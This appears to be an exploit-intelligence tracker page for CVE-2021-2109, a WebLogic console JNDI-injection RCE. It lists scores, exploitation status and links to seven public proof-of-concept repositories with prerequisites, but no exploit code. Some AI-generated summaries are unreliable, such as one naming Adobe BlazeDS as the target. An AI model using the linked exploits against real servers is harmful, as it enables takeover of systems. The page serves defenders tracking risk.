CVE-2021-2109

HIGH IN THE WILD

Oracle WebLogic Server <14.1.1.0.0 - RCE

Title source: llm
STIX 2.1

Exploitation Summary

CVE-2021-2109 has been observed exploited in the wild (reported by InTheWild.io). EIP tracks 7 public exploits from researchers including Photubias, Al1ex, rabbitsafe.

AI-analyzed exploit summary This exploit leverages CVE-2021-2109, an RCE vulnerability in Oracle WebLogic Server, by using JNDI injection to execute arbitrary commands on the target system. It requires authentication and uses a Java-based LDAP listener to achieve remote code execution.

Description

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).

Exploits (7)

exploitdb WORKING POC
by Photubias · pythonwebappsjava
https://www.exploit-db.com/exploits/49461

This exploit leverages CVE-2021-2109, an RCE vulnerability in Oracle WebLogic Server, by using JNDI injection to execute arbitrary commands on the target system. It requires authentication and uses a Java-based LDAP listener to achieve remote code execution.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Auth required
Prerequisites: Authenticated access to WebLogic console · Java runtime environment · JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar in the same directory
devstral-2 · analyzed Feb 16, 2026 Full analysis →
nomisec WORKING POC 31 stars
by Al1ex · poc
https://github.com/Al1ex/CVE-2021-2109

This repository contains a functional exploit for CVE-2021-2109, a deserialization vulnerability in Oracle WebLogic Server. The exploit leverages JNDI injection via LDAP to achieve remote code execution (RCE) by loading a malicious Java class.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server (10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0)
Auth required
Prerequisites: Authenticated access to WebLogic Console · LDAP server hosting malicious payload · HTTP server to serve the exploit class
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC 9 stars
by rabbitsafe · poc
https://github.com/rabbitsafe/CVE-2021-2109

This repository contains a functional Python exploit for CVE-2021-2109, a JNDI injection vulnerability in Oracle WebLogic Server. The exploit leverages LDAP for remote code execution, with support for both authenticated and unauthenticated attack vectors (via CVE-2020-14750).

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server (10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0)
No auth needed
Prerequisites: LDAP server for JNDI injection · Network access to WebLogic Server · Optional: Valid credentials for authenticated exploitation
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC 4 stars
by yuaneuro · poc
https://github.com/yuaneuro/CVE-2021-2109_poc

This repository contains a functional PoC for CVE-2021-2109, a deserialization vulnerability in Oracle WebLogic Server. The script sends a crafted HTTP request to trigger JNDI injection via LDAP, leveraging an external JNDIExploit server for payload delivery.

Classification
Working Poc 95%
Attack Type
Rce
Complexity
Moderate
Reliability
Reliable
Target: Oracle WebLogic Server
No auth needed
Prerequisites: External JNDIExploit server running · Target WebLogic Server accessible
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec STUB 3 stars
by Vulnmachines · poc
https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109

The repository contains only a minimal README with a title and incorrect CVE reference (CVE-2022-2109 instead of CVE-2021-2109), with no exploit code, technical details, or additional content.

Classification
Stub 90%
Attack Type
Other
Complexity
Trivial
Reliability
Theoretical
Target: Oracle WebLogic
No auth needed
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec WORKING POC
by lnwza0x0a · poc
https://github.com/lnwza0x0a/CVE-2021-2109

This repository contains a functional exploit for CVE-2021-2109, leveraging deserialization vulnerabilities in Adobe BlazeDS. The exploit includes multiple serialization/deserialization utilities and a payload execution mechanism.

Classification
Working Poc 95%
Attack Type
Deserialization
Complexity
Moderate
Reliability
Reliable
Target: Adobe BlazeDS
No auth needed
Prerequisites: Network access to vulnerable BlazeDS server · Java runtime environment
devstral-2 · analyzed Feb 18, 2026 Full analysis →
nomisec SCANNER
by dinosn · poc
https://github.com/dinosn/CVE-2021-2109

This repository contains a Python script that scans for CVE-2021-2109, an Oracle WebLogic vulnerability, by checking for the presence of a specific path. It does not exploit the vulnerability but detects potential exposure.

Classification
Scanner 90%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Oracle WebLogic Server
No auth needed
Prerequisites: Network access to the target WebLogic server
devstral-2 · analyzed Feb 18, 2026 Full analysis →

References (2)

Core 2
Core References

Scores

CVSS v3 7.2
EPSS 0.7024
EPSS Percentile 99.3%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact total

Details

InTheWild.io 2021-12-04
Status published
Products (5)
oracle/weblogic_server 10.3.6.0.0
oracle/weblogic_server 12.1.3.0.0
oracle/weblogic_server 12.2.1.3.0
oracle/weblogic_server 12.2.1.4.0
oracle/weblogic_server 14.1.1.0.0
Published Jan 20, 2021
Tracked Since Feb 18, 2026